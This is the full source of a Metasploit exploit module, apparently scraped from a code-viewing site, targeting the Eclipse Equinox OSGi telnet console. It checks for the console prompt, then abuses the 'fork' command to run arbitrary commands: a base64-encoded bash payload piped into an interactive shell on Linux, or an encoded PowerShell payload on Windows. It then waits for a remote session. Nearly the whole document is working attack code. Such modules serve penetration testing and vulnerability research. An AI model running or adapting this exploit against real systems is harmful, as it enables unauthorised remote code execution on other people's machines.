Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/multi/misc/osgi_console_exec.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##4require 'base64'56class MetasploitModule < Msf::Exploit::Remote7Rank = NormalRanking89include Msf::Exploit::Remote::Tcp10include Msf::Exploit::CmdStager11include Msf::Exploit::Powershell1213TELNET_IAC = Msf::Exploit::Remote::Telnet1415def initialize(info = {})16super(update_info(info,17'Name' => 'Eclipse Equinox OSGi Console Command Execution',18'Description' => %q{19Exploit Eclipse Equinox OSGi (Open Service Gateway initiative) console20'fork' command to execute arbitrary commands on the remote system.21},22'Author' =>23[24'Quentin Kaiser <[email protected]>'25],26'License' => MSF_LICENSE,27'References' =>28[29['URL', 'https://www.eclipse.org/equinox/documents/quickstart-framework.php']30],31'Platform' => %w{ linux win },32'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64],33'Targets'=> [34[ 'Linux (Bash Payload)', { 'Platform' => 'linux' } ],35[ 'Windows (Powershell Payload)', { 'Platform' => 'win' } ]36],37'CmdStagerFlavor' => [ 'bourne' ],38'DisclosureDate' => '2018-02-13',39'DefaultTarget' => 0))40deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')41register_options([42OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])43])44end4546def check47connect48res = sock.get_once49if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\50TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\51TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\52TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE53# terminal type 'xterm-256color' = \x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x7254sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\55"\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE)56res = sock.get_once57end58disconnect59if res && res == "osgi> "60return Exploit::CheckCode::Vulnerable61end62Exploit::CheckCode::Safe63end6465def exploit66begin67print_status("Accessing the OSGi console ...")6869unless check == Exploit::CheckCode::Vulnerable70fail_with(Failure::NoTarget, "#{peer} - Failed to access the OSGi console")71end7273if target['Platform'] == "win" then74exec_command("fork \"#{cmd_psh_payload(payload.encoded, payload_instance.arch.first, {encode_final_payload: true, remove_comspec: true})}\"")75else76execute_cmdstager({:flavor => :bourne})77end7879print_status("#{rhost}:#{rport} - Waiting for session...")8081(datastore['TIME_WAIT']).times do82Rex.sleep(1)83# Success! session is here!84break if session_created?85end86rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e87fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")88ensure89disconnect90end91end9293def exec_command(cmd)94connect95res = sock.get_once96if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\97TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\98TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\99TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE100sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\101"\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE)102res = sock.get_once103end104print_status("Exploiting...")105sock.put("#{cmd}\r\n")106res = sock.get107sock.put("disconnect\r\n")108res = sock.get109sock.put("y\r\n")110end111112def execute_command(cmd, opts={})113cmd_b64 = Base64.encode64(cmd).gsub(/\s+/, "")114# Runtime.getRuntime().exec() workaround on Linux. Requires bash.115exec_command("fork \"bash -c {echo,#{cmd_b64}}|{base64,-d}|{bash,-i}\"")116end117end118119120